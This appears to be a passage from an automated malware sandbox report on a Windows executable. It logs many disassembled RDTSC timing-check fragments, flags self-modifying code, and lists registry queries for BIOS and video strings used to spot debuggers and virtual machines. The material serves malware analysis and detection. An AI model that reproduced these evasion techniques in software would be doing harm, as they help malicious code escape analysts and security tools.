                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65C6 second address: 5D65CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65CC second address: 5D65D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65D0 second address: 5D65D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65D4 second address: 5D65EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3F244F40DDh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68BD second address: 5D68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2700h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68D8 second address: 5D68F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3F244F40E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D68F6 second address: 5D6911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3F24EE2705h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6911 second address: 5D693C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F3F244F40DFh 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D693C second address: 5D6944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6944 second address: 5D694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D694C second address: 5D6952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6952 second address: 5D6961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F3F244F40DEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD08F second address: 5DD099 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD099 second address: 5DD0D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F3F244F40DAh 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push ecx 0x00000016 ja 00007F3F244F40D6h 0x0000001c jmp 00007F3F244F40E1h 0x00000021 pop ecx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD275 second address: 5DD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD27B second address: 5DD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD27F second address: 5DD283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD5D3 second address: 5DD5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD727 second address: 5DD72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD882 second address: 5DD886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD886 second address: 5DD89C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3F24EE26F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD89C second address: 5DD8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD8A0 second address: 5DD8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3F24EE2701h 0x0000000d jns 00007F3F24EE26F6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DD8BF second address: 5DD8EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F3F244F40E0h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3F244F40E1h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDBD8 second address: 5DDBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F3F24EE2704h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDBFB second address: 5DDC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDC03 second address: 5DDC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3F24EE2700h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DDC18 second address: 5DDC35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3F244F40E0h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7604 second address: 5E7610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3F24EE26F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7610 second address: 5E762F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F3F244F40E3h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E762F second address: 5E7638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7638 second address: 5E763E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E763E second address: 5E7644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7644 second address: 5E764A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E764A second address: 5E764E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7359 second address: 5E735D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1F91 second address: 5F1FAE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3F24EE26F6h 0x00000008 jnc 00007F3F24EE26F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3F24EE26FDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1FAE second address: 5F1FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F3F244F40D6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1FBA second address: 5F1FC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3F24EE26F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1FC9 second address: 5F1FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F3F244F40E2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1FE4 second address: 5F1FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F24EE2706h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FAC78 second address: 5FAC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FD000 second address: 5FD022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2701h 0x00000007 jmp 00007F3F24EE26FAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6090CA second address: 609114 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3F244F40F2h 0x00000008 jp 00007F3F244F40EBh 0x0000000e jmp 00007F3F244F40E5h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007F3F244F40D6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609114 second address: 609118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 609118 second address: 60911E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B947 second address: 60B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B94D second address: 60B956 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B956 second address: 60B95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B70 second address: 613B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B74 second address: 613B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3F24EE26FAh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F3F24EE26F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B8F second address: 613B95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B95 second address: 613B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B9B second address: 613BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61285C second address: 612861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612C9A second address: 612CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F3F244F40D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CBE second address: 612CC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CC2 second address: 612CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CDB second address: 612CE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3F24EE26F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CE7 second address: 612CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CEB second address: 612CF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612CF4 second address: 612D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3F244F40DBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F244F40E1h 0x00000016 jmp 00007F3F244F40E2h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612D2E second address: 612D34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612ECD second address: 612ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612ED3 second address: 612ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612ED7 second address: 612F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3F244F40E3h 0x0000000c jng 00007F3F244F40D6h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3F244F40DAh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61739B second address: 6173A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625DC2 second address: 625DF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3F244F40D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007F3F244F40D6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 jmp 00007F3F244F40E8h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jbe 00007F3F244F40DEh 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6273B9 second address: 6273E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F3F24EE2704h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F3F24EE26F6h 0x00000014 pop esi 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F3F24EE26F6h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628B66 second address: 628B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3EA second address: 62A3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3F0 second address: 62A3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F3F244F40D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A3FD second address: 62A429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2701h 0x00000007 ja 00007F3F24EE26F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jl 00007F3F24EE26F6h 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A429 second address: 62A42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636F53 second address: 636F5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636F5B second address: 636F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636F62 second address: 636F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3F24EE26F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638A51 second address: 638A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F3F244F40E0h 0x0000000e js 00007F3F244F40D8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638C26 second address: 638C30 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3F24EE26FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649855 second address: 64985B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64985B second address: 649869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3F24EE26F8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648941 second address: 64894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3F244F40D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649070 second address: 64908D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F3F24EE26FAh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jnp 00007F3F24EE26F8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649492 second address: 649498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649498 second address: 6494A3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6494A3 second address: 6494A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C41F second address: 64C425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA34 second address: 64FA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3F244F40E1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3F244F40E2h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FA6C second address: 64FA71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB0275 second address: 4CB027A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB027A second address: 4CB02DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3F24EE26FDh 0x00000009 jmp 00007F3F24EE26FBh 0x0000000e popfd 0x0000000f jmp 00007F3F24EE2708h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F3F24EE26FBh 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F3F24EE2706h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB02DC second address: 4CB02E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CB02E2 second address: 4CB02E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56E71A second address: 56E720 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3C17D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 58E55F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5ECEE7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
